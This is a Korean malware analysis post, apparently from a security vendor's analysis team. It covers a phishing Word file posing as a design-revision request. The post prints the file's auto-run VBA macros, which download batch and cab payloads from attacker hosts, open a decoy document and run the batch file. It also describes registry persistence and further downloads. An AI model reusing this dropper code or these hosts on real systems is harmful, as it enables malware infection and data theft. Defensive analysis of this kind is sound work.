Posted By ASEC , 2021년 12월 6일

디자인수정 요청 문서로 위장한 정보 탈취 목적의 악성 워드

ASEC 분석팀은 국내 사용자를 대상으로 한 악성 워드 문서가 유포되고 있음을 확인하였다. 파일명은 디자인수정 요청.doc 로 아래와 같이 매크로 실행을 유도하는 이미지가 포함되어있다.

해당 워드 파일 내부에는 아래와 같이 hxxp://filedownloaders.com/doc09 에서 추가 파일을 다운로드하는 악성 매크로가 포함되어있다. 사용자가 콘텐츠 사용 버튼 클릭 시 매크로가 자동으로 실행되어 추가 악성 파일을 다운로드한다.

Sub Document_Open()
    Dim RetVal As Long
    
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)
    
    Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
    OpenDoc.Visible = True
    Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")

이후 다운받은 temp.doc 문서 파일을 실행한다. 해당 워드 문서는 아래와 같이 국내 기업을 사칭한 내용을 담고 있다.

temp.doc 에는 앞서 다운로드한 no1.bat 파일을 실행시키는 매크로가 포함되어 있다.

Sub Document_Open()
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub

워드 파일을 통해 실행된 no1.bat 은 vvire.bat 을 실행시킨다. vvire.bat이 존재하지 않을 경우 hxxp://filedownloaders.com/doc09/vbs6.txt 에서 다운로드 한 setup.cab 파일의 압축 해제 후 vvire.bat을 실행한다.

vvire.bat은 레지스트리 등록 및 no4.bat 파일 실행, 추가 파일 다운로드 기능을 수행한다.

Start.vbs 파일을 레지스트리에 등록하여 vvire.bat 파일이 자동으로 실행될 수 있도록 하며, no4.bat 실행 후 no1.bat을 삭제한다. 이후 특정 파일이 존재하는 지 확인하여 hxxp://senteroman.com/dow11/%COMPUTERNAME%.txt 에서 추가 파일을 다운로드 및 실행한다. 현재 해당 파일의 경우 다운로드가 되지 않아 확인이 불가하다.

Start.vbs 파일은 아래와 같다.